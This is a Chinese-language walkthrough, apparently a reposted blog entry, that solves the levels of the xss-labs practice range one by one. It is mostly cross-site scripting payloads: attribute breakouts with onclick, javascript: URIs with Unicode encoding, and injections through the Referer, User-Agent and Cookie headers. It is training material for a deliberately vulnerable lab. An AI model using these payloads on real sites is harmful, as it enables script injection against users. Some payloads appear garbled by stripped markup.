xss-labs靶场通关payload

地址: 欢迎来到XSS挑战
流程:
1.正常人 正常去输入即可
2.标准测试代码输入 找相应的互动点有哪些 查看网页源代码
3.寻找注入点 构造payload提交即可
ssaq.com   dsds' value=javascript:alert(1)
Level1
url:https://xssaq.com/yx/level1.php?name=test

欢迎用户test

https://xssaq.com/yx/level1.php?name=test123

欢迎用户test123

url:https://xssaq.com/yx/level1.php?name=

欢迎用户

?name=
Level2
alert(1)">
haha"><"
haha">//
haha"><"
Level3
haha123' οnclick='alert(1)
haha123' οnclick='alert(1)
点一下搜索框
Level4
haha123" οnclick="alert(1)
haha123" οnclick="alert(1)
点一下搜索框触发即可
Level5
小知识
Level6
Level7
alert(1)">
"><"
<>alert(1)<"">
">alert(1)<"
">alert(1)<"
Level8
小知识:
unicode编码在前端会解析为正常的字符串 但是在a标签的href中用双引号引起来后 
href="xxxx"  xxxx的任何字符串都会被当作协议来执行
"><"
"><"
javascript:alert(1)
将 javascript:alert(1) 进行unicode字符编码:
javascript:alert(1)
javascript:alert(1)
Level9
一定要包含http:// 有就可以了 放注释里面也可以 所以很猥琐!
javascript:alert(1)//http://
javascript:alert(1)//http://
Level10  DOM型XSS
xss-labs靶场通关payload_第1张图片
https://xssaq.com/yx/level10.php?keyword=

没有找到和<script>alert(1)</script>相关的结果.

https://xssaq.com/yx/level10.php?keyword=javascript:alert(1)

没有找到和相关的结果.

https://xssaq.com/yx/level10.php?keyword=

没有找到和</h2><script>alert(1)</script><h2>相关的结果.

https://xssaq.com/yx/level10.php?t_link=
#https://xssaq.com/yx/level10.php?keyword=haha&t_link=1&t_history=2&t_sort=3
https://xssaq.com/yx/level10.php?t_history=
https://xssaq.com/yx/level10.php?t_sort=
scriptalert(1)/script" type="hidden">
https://xssaq.com/yx/level10.php?keyword=haha123&t_sort=" type="text" οnclick="alert(1)"
haha123&t_sort=" type="text" οnclick="alert(1)"
Level11
xss-labs靶场通关payload_第2张图片
#尝试1 针对有回显的t_sort尝试 发现已经对相关语句进行了处理 行不通了 换思路
https://xssaq.com/yx/level11.php?keyword=good&t_link=1&t_history=2&t_sort=3&t_ref=4
=good&t_link=1&t_history=2&t_sort=&t_ref=4
=good&t_link=1&t_history=2&t_sort=" type="text" οnclick="alert(1)&t_ref=4
t_sort=" type="text" οnclick="alert(1)
#尝试2 根据初始进入网页的Referer观察 发现Referer可能是注入点 burp抓包  添加到Referer中
从第十关到第11关的时候,最开始查看源代码
发现从10关进入可以在t_ref中看到地址  即referer来源 但是有任何修改后 这个值就不存在了
说明可以通过burp抓包 然后修改Referer 从而可以修改到t_ref的值
Referer:"><"    //尝试失败
Referer:haha&t_sort=" type="text" οnclick="alert(1)
xss-labs靶场通关payload_第3张图片 xss-labs靶场通关payload_第4张图片
Level12
相同的思路 初始进入先查看源代码 发现t_ua有value 考虑是User-Agent 不妨通过burp抓包尝试
修改相应的User-Agent 发现相应的t_ua的值存在变化 所以方法相同
User-Agent: " type="text" οnclick="alert(1)
Level13
1.首先观察源代码
xss-labs靶场通关payload_第5张图片
2.通过burp抓包获取相关的包的内容
3.修改相应的Cookie位置的内容即可 和之前相同
Cookie: user=" type="text" οnclick="alert(1)
Level14
Level15
Level16
小知识
level16.php?keyword=123
level16.php?keyword=123%0aοnlοad=alert(1)>
Level17
level17.php?arg01=a&arg02=b
level17.php?arg01=onmouseover&arg02=javascript:alert(1)

你可能感兴趣的:(靶场与CTF系列,安全,web安全)